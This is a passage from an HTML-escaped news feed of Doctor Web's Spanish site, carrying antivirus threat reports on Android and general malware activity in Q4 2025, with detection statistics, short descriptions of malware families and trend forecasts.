&lt;p&gt;En 2025, los creadores de malware continuaron utilizando varias técnicas para proteger los troyanos bancarios de Android frente al análisis y la detección. Por ejemplo, se propagaron varios métodos de ofuscación y ocultación de código, como DEX to C (conversión del código ejecutable DEX a código en lenguaje C), así como la ofuscación de aplicaciones maliciosas mediante la herramienta NP Manager.&lt;/p&gt;

&lt;p&gt;Siguieron siendo populares las técnicas de manipulación del formato de archivos ZIP, que es el formato que utilizan en la práctica los archivos APK de las aplicaciones Android. Entre ellas se incluyen la manipulación de los campos &lt;span class="string"&gt;compression method&lt;/span&gt; y &lt;span class="string"&gt;compressed size&lt;/span&gt; en la estructura del encabezado del archivo local dentro del APK, así como el uso de datos incorrectos sobre el disco en los registros ECDR y CD. Sobre estos métodos ya hablamos con más detalle en el &lt;a href="https://news.dr-web.es/show/review/&amp;i=14970#troj" target="_blank"&gt;informe anterior&lt;/a&gt;, en la sección dedicada a los troyanos bancarios. Tras este tipo de manipulaciones, los troyanos siguen siendo plenamente funcionales, pero muchas herramientas de análisis estático los consideran dañados y no pueden procesarlos correctamente.
Los creadores de malware empezaron a utilizar con mayor frecuencia los programas dropper para ocultar la carga maliciosa principal, por ejemplo, con el fin de esquivar los mecanismos internos de protección del catálogo de Google Play. Los ciberdelincuentes también recurren a asistentes basados en inteligencia artificial para escribir el código de los troyanos bancarios, lo que simplifica su desarrollo y favorece la aparición de nuevas familias. Además, cada vez usan con mayor frecuencia bots de Telegram para el control de los troyanos bancarios y la exfiltración de datos desde los dispositivos infectados.&lt;/p&gt;

&lt;h3&gt;Perspectivas y tendencias&lt;/h3&gt;

&lt;p&gt;En 2025 observamos una alta actividad de troyanos publicitarios, que siguen siendo las amenazas más populares para el sistema operativo Android. También volvieron a propagarse ampliamente varios programas falsos utilizados con fines fraudulentos, entre ellos para el phishing y el robo de dinero. Además, continuó el aumento del número de ataques con troyanos bancarios. Todas estas aplicaciones maliciosas constituyen una fuente de ingresos ilegales para los ciberdelincuentes, por lo que su popularidad se mantiene en niveles elevados. Es muy probable que el próximo año vuelvan a ser una de las principales herramientas de obtención de beneficios para los atacantes. Al mismo tiempo, los creadores de malware recurren cada vez más a bots de Telegram para controlar los troyanos bancarios, una tendencia que previsiblemente continuará.&lt;/p&gt;

&lt;p&gt;La aparición del malware &lt;a href="https://vms.dr-web.es/search/?q=Android.Clipper.31&amp;lng=es"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt;,así como de nuevas versiones de los troyanos &lt;a href="https://vms.dr-web.es/search/?q=Android.Vo1d&amp;lng=es"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; y &lt;a href="https://vms.dr-web.es/search/?q=Android.Triada&amp;lng=es"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt; en el firmware de smartphones y decodificadores de TV, indica que los delincuentes mantienen su interés en métodos de propagación que dificultan bastante la detección del malware. Es muy probable que esta tendencia se mantenga el próximo año y que veamos nuevos casos de malware preinstalado en smartphones, decodificadores de TV y otros tipos de dispositivos Android.&lt;/p&gt;

&lt;p&gt;También cabe esperar la aparición de malware más complejo, capaz de realizar un amplio abanico de tareas. Entre ellos podrían encontrarse nuevos backdoors y distintos troyanos espía. Además, los creadores de malware volverán previsiblemente a utilizar catálogos oficiales de aplicaciones, incluido Google Play, para alojar software malicioso y no deseado.&lt;/p&gt;

&lt;p&gt;Los delincuentes seguirán incorporando distintos mecanismos de protección en las herramientas que desarrollan y recurrirán con mayor frecuencia a asistentes basados en inteligencia artificial para escribir código, lo que probablemente dará lugar a la aparición de un mayor número de nuevas familias de malware.&lt;/p&gt;

&lt;p&gt;La empresa Doctor Web supervisa de forma continua el panorama de amenazas en el segmento móvil y responde con rapidez a los nuevos desafíos. A los usuarios de Android les recomendamos instalar Dr.Web Security Space para dispositivos móviles, con el fin de protegerse frente al malware y otras aplicaciones peligrosas.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/2025%20review%20of%20virus%20activity%20on%20mobile%20devices/README.adoc" target="_blank"&gt;Indicadores de compromiso&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.dr-web.es/show/?i=15101&amp;lng=es</guid><title>Doctor Web: informe de la actividad de virus para dispositivos móviles en el IV trimestre del año 2025</title><link>https://news.dr-web.es/show/?i=15101&amp;lng=es&amp;c=5</link><pubDate>Mon, 12 Jan 2026 00:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;12 de enero de 2026&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;newslead&gt;Según los datos estadísticos de detecciones de Dr.Web Security Space para dispositivos móviles, en el IV trimestre del año 2025 las amenazas más populares en Android otra vez fueron los troyanos publicitarios &lt;a href="https://vms.dr-web.es/search/?q=Android.MobiDash&amp;lng=es"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; y &lt;a href="https://vms.dr-web.es/search/?q=Android.HiddenAds&amp;lng=es"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; que visualizaban anuncios importunos. Así mismo, su actividad bajó: los primeros se detectaron en dispositivos protegidos un 43,24% menos, y los segundos — un 18,06% menos. Los siguieron los troyanos de la familia &lt;b&gt;Android.Siggen&lt;/b&gt; que activan malware con funcionalidad de varios tipos. Los mismos también se detectaron un poco menos, un 27,47%.&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;Al mismo tiempo, se detectó un crecimiento importante de troyanos bancarios que los usuarios afrontaron un  65,52% más. Este crecimiento se debe sobre todo a los representantes de la familia &lt;a href="https://vms.dr-web.es/search/?q=Android.Banker&amp;lng=es"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;. Este malware intercepta los SMS con códigos de un solo uso para confirmar las operaciones bancarias, y también pueden imitar el diseño de software bancario real y visualizar las ventanas phishing.&lt;/p&gt;

&lt;p&gt;Entre software no deseado los más populares fueron los programas en Android modificados a través del servicio en la nube CloudInject (el antivirus Dr.Web los detecta como &lt;a href="https://vms.dr-web.es/search/?q=Program.CloudInject&amp;lng=es"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;). Con el mismo, a las aplicaciones se añaden los permisos de sistema peligrosos y el código ofuscado cuya funcionalidad no puede ser controlada. Además, en los dispositivos con mucha frecuencia se detectaban los falsos antivirus &lt;a href="https://vms.dr-web.es/search/?q=Program.FakeAntiVirus&amp;lng=es"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt; que detectan amenazas no existentes y para “desinfectar” las mismas demandan que se adquiera la versión completa, así como &lt;a href="https://vms.dr-web.es/search/?q=Program.FakeMoney&amp;lng=es"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt; — las aplicaciones que supuestamente permiten ganar dinero al realizar varias tareas.&lt;/p&gt;

&lt;p&gt;El software más popular potencialmente peligroso en el IV trimestre fueron las aplicaciones &lt;b&gt;Tool.NPMod&lt;/b&gt; modificadas con la utilidad NP Manager. La misma ofusca el código de los mods y añade un módulo especial en los mismos que permite esquivar la verificación de la firma digital una vez modificadas las aplicaciones. Entre adware los líderes eran los representantes de la familia &lt;a href="https://vms.dr-web.es/search/?q=Adware.Adpush&amp;lng=es"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;. Son complementos especiales que los desarrolladores implementan en software para visualizar notificaciones de publicidad.&lt;/p&gt;

&lt;p&gt;En octubre nuestros expertos &lt;a href="https://news.drweb.ru/show/?i=15076&amp;lng=ru" target="_blank"&gt;informaron&lt;/a&gt; sobre un backdoor peligroso &lt;a href="https://vms.dr-web.es/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=es"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; que los malintencionados implementaron en las modificaciones no oficiales del Messenger Telegram X y propagaron tanto a través de los sitios web maliciosos como a través de catálogos terceros  de aplicaciones en Android. El malware roba los nombres de usuario y las contraseñas de cuentas de Telegram, así como otros datos privados. Además, con el mismo los ciberdelincuentes en realidad pueden administrar la cuenta de la víctima y sin su autorización realizar en el Messenger varias acciones en su nombre. Por ejemplo, unirse a canales en  Telegram y salir de los mismos, ocultar los nuevo dispositivos autorizados, ocultar los mensajes determinados etc. &lt;a href="https://vms.dr-web.es/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=es"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; se administra así mismo a través de la base de datos Redis, lo cual anteriormente no se detectaba en amenazas en Android. En total, el backdoor infectó unos 58 000 dispositivos, entre los cuales hubo unos 3 000 modelos de varios tipos de smartphones, tabletas, consolas TV y vehículos con ordenadores de a bordo basados en Android.&lt;/p&gt;

&lt;p&gt;Durante el trimestre pasado, el laboratorio antivirus de la empresa Doctor Web detectó en el catálogo Google Play nuevo malware entre el cual hubo troyanos &lt;a href="https://vms.dr-web.es/search/?q=Android.Joker&amp;lng=es"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; que suscribían a las víctimas a servicios de pago, y varios programas falsos &lt;a href="https://vms.dr-web.es/search/?q=Android.FakeApp&amp;lng=es"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;, aplicados en esquemas fraudulentos, En total, los mismos fueron descargados como mínimo 263 000 veces.&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;TENDENCIAS CLAVE DEL IV TRIMESTRE&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;Los troyanos publicitarios siguen siendo las amenazas en Android más populares&lt;/li&gt;
        &lt;li&gt;Crecimiento del número de ataques de troyanos bancarios&lt;/li&gt;
        &lt;li&gt;Propagación del backdoor peligroso &lt;a href="https://vms.dr-web.es/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=es"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, implementado en las modificaciones del Messenger Telegram X&lt;/li&gt;
        &lt;li&gt;Aparición de más malware en el catálogo Google Play&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;Según los datos de Dr.Web Security Space para dispositivos móviles&lt;/h3&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/01_malware_q4_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/01_malware_q4_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Android.MobiDash&amp;lng=es"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7859&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Un programa troyano que visualiza publicidad importuna. Es un complemento que los desarrolladores de software implementan en aplicaciones.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Android.FakeApp&amp;lng=es"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1600&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Un programa troyano que carga el sitio web indicado en su configuración. Las modificaciones conocidas de este malware cargan el sitio web de un casino en línea.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Android.Click&amp;lng=es"&gt;&lt;b&gt;Android.Click&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1812&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Detección de mods maliciosos del Messenger del messenger WhatsApp, que pueden cargar varios sitios web en modo de segundo plano sin autorización del usuario.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Android.Packed.57.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Detección de un ofuscador que así mismo se usa para proteger malware (por ejemplo, algunas versiones de troyanos bancarios &lt;b&gt;Android.SpyMax&lt;/b&gt;).&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Android.Triada&amp;lng=es"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5847&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Detección de un comprimidor para los troyanos de la familia &lt;a href="https://vms.dr-web.es/search/?q=Android.Triada&amp;lng=es"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt;, destinado para proteger los mismos contra análisis y detección. Con mayor frecuencia, los malintencionados lo usan junto con los mods maliciosos del messenger Telegram, donde estos troyanos están directamente incrustados. &lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/02_unwanted_q_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/02_unwanted_q_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Program.CloudInject&amp;lng=es"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Program.CloudInject&amp;lng=es"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Detección de aplicaciones en Android modificadas con el servicio en la nube CloudInject y la utilidad en Android del mismo nombre (añadida a la base de virus de Dr.Web como &lt;a href="https://vms.dr-web.es/search/?q=Tool.CloudInject&amp;lng=es"&gt;&lt;b&gt;Tool.CloudInject&lt;/b&gt;&lt;/a&gt;). Estos programas se modifican en un servidor remoto, así mismo, el usuario (modder) interesado en su modificación no controla qué exactamente se implementará en los mismos. Además, las aplicaciones reciben un conjunto de permisos peligrosos. Una vez modificados los programas, el modder puede administrarlos de forma remota: bloquearlos, visualizar los diálogos personalizados, supervisar el hecho de instalación y desinstalación de otro software etc.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Program.FakeAntiVirus&amp;lng=es"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Detección de adware que imita el funcionamiento de software antivirus. Estos programas pueden informar sobre las amenazas no existentes y engañar a usuarios, al demandar la compra de versión completa.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Program.FakeMoney&amp;lng=es"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Detección de aplicaciones que supuestamente permiten ganar dinero al realizar algunas acciones o tareas. Estos programas imitan el abono de premios, así mismo, para poder usar el dinero “ganado”, hay que acumular un importe determinados. Normalmente suelen disponer de una lista de sistemas de pago populares y bancos a través de los cuales supuestamente se puede transferir los premios. Pero hasta si los usuarios consiguen acumular el importe suficiente para poder usarlo, los no reciben los pagos prometidos. Esta entrada también se usa para detectar otro software no deseado basado en el código de estos programas. &lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Program.SnoopPhone.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Programa para supervisar a los titulares de dispositivos en Android. Permite leer los SMS, recibir la información sobre las llamadas telefónicas, supervisar la ubicación del dispositivo y grabar el audio del entorno.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/03_riskware_q4_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/03_riskware_q4_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.3&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Detección de aplicaciones en Android modificadas con la utilidad NP Manager. Estos programas tienen implementado un módulo especial que permite esquivar la verificación de la firma digital una vez modificados.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Tool.LuckyPatcher&amp;lng=es"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Una utilidad que permite modificar las aplicaciones en Android instaladas (crear los parches para las mismas) para modificar su lógica de funcionamiento o esquivar alguna restricción. Por ejemplo, con la misma los usuarios pueden intentar desactivar la comprobación del acceso root en programas bancarios y recibir los recursos ilimitados en los juegos. Para crear los parches, la utilidad descarga de Internet los scripts preparados a propósito que pueden ser creados por cualquier persona interesada. La funcionalidad de estos scripts también puede resultar maliciosa, por lo tanto, los parches creados pueden ser potencialmente peligrosos.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Tool.Androlua&amp;lng=es"&gt;&lt;b&gt;Tool.Androlua&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Detección de algunas versiones potencialmente peligrosas del framework especializado para desarrollar programas en Android en lenguaje de programación de scripts Lua. La lógica básica de aplicaciones Lua está ubicada en los scripts correspondientes que están cifrados y se descifran por el interpretador antes de ser ejecutados. Con frecuencia este framework de forma predeterminada solicita acceso a múltiples permisos de sistema para el funcionamiento. Como resultado, los scripts Lua realizados a través del mismo pueden realizar varias acciones maliciosas según los permisos obtenidos.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/04_adware_q4_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/04_adware_q4_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Adware.AdPush&amp;lng=es"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Adware.Adpush&amp;lng=es"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.21846&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Módulos de publicidad que pueden ser integrados en programas en Android. Visualizan notificaciones de publicidad que engañan a usuarios. Por ejemplo, estas notificaciones pueden recordar mensajes del sistema operativo. Además, estos módulos recopilan algunos datos privados y también pueden cargar otras aplicaciones e iniciar su instalación.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Bastion.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Detección de programas optimizadores que crean notificaciones de forma periódica con mensajes engañosos sobre una supuesta falta de memoria y errores del sistema, con el fin de visualizar publicidad durante el proceso de “optimización”.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Airpush.7.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Los complementos incrustados en aplicaciones en Android y visualizan publicidad de varios tipos. Según la versión y la modificación, pueden ser notificaciones de publicidad, ventanas emergentes o banners. Con estos módulos los malintencionados con frecuencia propagan malware al proponer instalar algún software. Además, estos módulos transfieren al servidor remoto la información privada de varios tipos.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Adware.ModAd&amp;lng=es"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Detección de algunas versiones modificadas (mods) del messenger WhatsApp, cuyas funciones tienen implementado el código para cargar los enlaces especificados a través  de la visualización web durante el uso del messenger. Desde estas direcciones de Internet se realiza la redirección a los sitios web publicitados, por ejemplo, de casinos en línea y de operadores de apuestas, sitios web para adultos.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Amenazas en Google Play&lt;/h3&gt;

&lt;p&gt;Durante el IV trimestre del año 2025 los analistas de virus de la empresa Doctor Web detectaron la aparición en el catálogo Google Play de más de dos decenas de malware &lt;a href="https://vms.dr-web.es/search/?q=Android.Joker&amp;lng=es"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;, destinados para suscribir a usuarios a servicios de pago. Los malintencionados los camuflaron por varios tipos de software: messengers, utilidades para optimizar el funcionamiento de sistemas, los editores gráficos y los programas para ver películas.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/05_Android.Joker_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/05_Android.Joker_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Unos ejemplos de malware detectado &lt;b&gt;Android.Joker&lt;/b&gt;. &lt;b&gt;Android.Joker.2496&lt;/b&gt;  fue camuflado como la herramienta Useful Cleaner para «limpiar la basura» en el teléfono, y una de las modificaciones de &lt;b&gt;Android.Joker.2495&lt;/b&gt; — como reproductor de películas Reel Drama&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Así mismo, nuestros expertos detectaron varios nuevos programas falsos de la familia &lt;a href="https://vms.dr-web.es/search/?q=Android.FakeApp&amp;lng=es"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;. Al igual que anteriormente, algunos de ellos se propagaban haciéndose pasar por aplicaciones financieras y cargaban sitios web fraudulentos. Otras falsificaciones de este tipo se hacían pasar por juegos. En determinadas condiciones (por ejemplo, si la dirección IP del usuario cumplía los requisitos de los delincuentes), podían cargar sitios web de casas de apuestas y casinos en línea.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/06_Android.FakeApp.1910_1_Chicken_Road_Fun.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/06_Android.FakeApp.1910_1_Chicken_Road_Fun.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Un juego Chicken Road Fun era un programa falso &lt;b&gt;Android.FakeApp.1910&lt;/b&gt; y en vez de proporcionar funcionalidad esperada por el usuario pudo cargar la web de un casino en línea&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Para proteger los dispositivos en Android contra malware y software no deseado recomendamos a los usuarios instalar los productos antivirus Dr.Web para Android.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Q4%202025%20review%20of%20virus%20activity%20on%20mobile%20devices/README.adoc" target="_blank"&gt;Indicadores de compromiso&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.dr-web.es/show/?i=15099&amp;lng=es</guid><title>Doctor Web: informe de la actividad de virus en el IV trimestre del año 2025</title><link>https://news.dr-web.es/show/?i=15099&amp;lng=es&amp;c=5</link><pubDate>Mon, 12 Jan 2026 00:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;12 de enero de 2026&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;newslead&gt;Según las estadísticas de detecciones del antivirus Dr.Web, en el IV trimestre del año 2025 el número total de amenazas detectadas aumentó un 16,05% comparado con el tercer trimestre. Así mismo, el número de amenazas únicas bajó un 1,13%. Los más populares fueron adware no deseado, scripts maliciosos y varios tipos de malware, así mismo, los descargadores y los troyanos de publicidad.&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;En el tráfico de correo con mayor frecuencia se detectaban las aplicaciones troyanas entre los cuales había descargadores, programas robacontraseñas y droppers. Además, a través de los mensajes electrónicos se difundían los exploits, backdoors y varios scripts maliciosos.&lt;/p&gt;

&lt;p&gt;Los usuarios cuyos archivos fueron afectados por los troyanos cifradores con mayor frecuencia afrontaban los encoders &lt;b&gt;Trojan.Encoder.35534&lt;/b&gt;, &lt;b&gt;Trojan.Encoder.41868&lt;/b&gt; y &lt;a href="https://vms.dr-web.es/search/?q=Trojan.Encoder.29750&amp;lng=es"&gt;&lt;b&gt;Trojan.Encoder.29750&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;En octubre &lt;a href="https://news.dr-web.es/show/?i=15076" target="_blank"&gt;informamos&lt;/a&gt; sobre un backdoor para dispositivos en Android &lt;a href="https://vms.dr-web.es/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=es"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; que los ciberdelincuentes difunden como parte de versiones modificadas del messenger Telegram X. Este malware roba nombres de usuario y contraseñas de cuentas de Telegram y otros datos privados. Con el mismo, los creadores de virus pueden administrar las cuentas de víctimas hackeadas y controlar completamente el mismo Messenger al realizar varias acciones en nombre de usuarios. &lt;/p&gt;

&lt;p&gt;En noviembre nuestro laboratorio antivirus publicó una &lt;a href="https://news.dr-web.es/show/?i=15078" target="_blank"&gt;investigación&lt;/a&gt; de un ataque objetivo realizado por un grupo de hackers Cavalry Werewolf a una entidad pública rusa. Durante el peritaje realizado, los expertos de Doctor Web realizaron múltiples herramientas maliciosas de los malintencionados, así mismo, las herramientas con el código fuente abierto que los ciberdelincuentes aplican en sus campañas. También fueron analizadas las peculiaridades del grupo y las acciones en las redes comprometidas características para el mismo.&lt;/p&gt;

&lt;p&gt;Ya en diciembre en nuestro sitio web fue publicado el &lt;a href="https://news.dr-web.es/show/?i=15090" target="_blank"&gt;material&lt;/a&gt; sobre el troyano único &lt;a href="https://vms.dr-web.es/search/?q=Trojan.ChimeraWire&amp;lng=es"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;, que “infla” artificialmente la popularidad de los sitios web y, para ello, se hace pasar por una persona, de modo que sus acciones no sean bloqueadas por los sistemas antibot de las plataformas en línea. El malware busca de forma autónoma los sitios necesarios en los motores de búsqueda, los abre y realiza clics en las páginas web de acuerdo con los parámetros recibidos de los atacantes. &lt;a href="https://vms.dr-web.es/search/?q=Trojan.ChimeraWire&amp;lng=es"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; penetra en los equipos como resultado de funcionamiento de varios tipos de malware que explotan vulnerabilidades de la clase DLL Search Order Hijacking, y que además utilizan técnicas antidepuración para evitar su propia detección.&lt;/p&gt;

&lt;p&gt;Durante el IV trimestre los analistas de Internet de Doctor Web registraron nuevos sitios web fraudulentos que prometían a las víctimas potenciales ganar dinero rápido y fácil. Así mismo, fueron detectados otros recursos de Internet phishing y sitios web falsos de marketplaces.&lt;/p&gt;

&lt;p&gt;Nuestros expertos detectaron otro malware en el catálogo Google Play. Entre los mismos, los troyanos &lt;a href="https://vms.dr-web.es/search/?q=Android.Joker&amp;lng=es"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; que suscriben a los titulares de dispositivos en Android a servicios de pago, así como malware &lt;a href="https://vms.dr-web.es/search/?q=Android.FakeApp&amp;lng=es"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;, usado por los malintencionados en varios esquemas fraudulentos. Al mismo tiempo, las estadísticas de detecciones de Dr.Web Security Space para dispositivos móviles demostró un aumento de actividad de troyanos bancarios para la plataforma Android.&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;Tendencias clave del cuarto trimestre&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;Aumento del número de amenazas detectadas en dispositivos protegidos&lt;/li&gt;
        &lt;li&gt;Reducción del número de amenazas únicas usadas para ataques&lt;/li&gt;
        &lt;li&gt;Aumento del número de solicitudes para descifrar archivos afectados por los programas troyanos cifradores &lt;/li&gt;
        &lt;li&gt;Aumento de la actividad de troyanos bancarios destinados a titulares de dispositivos en Android&lt;/li&gt;
        &lt;li&gt;Propagación del backdoor &lt;a href="https://vms.dr-web.es/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=es"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; que hackea las cuentas de Telegram de usuarios en Android&lt;/li&gt;
        &lt;li&gt;Aparición de nuevo malware en el catálogo Google Play&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;Según los datos del servicio de estadísticas Doctor Web&lt;/h3&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/01_stat_q4_2025_en.png" data-fancybox&gt;
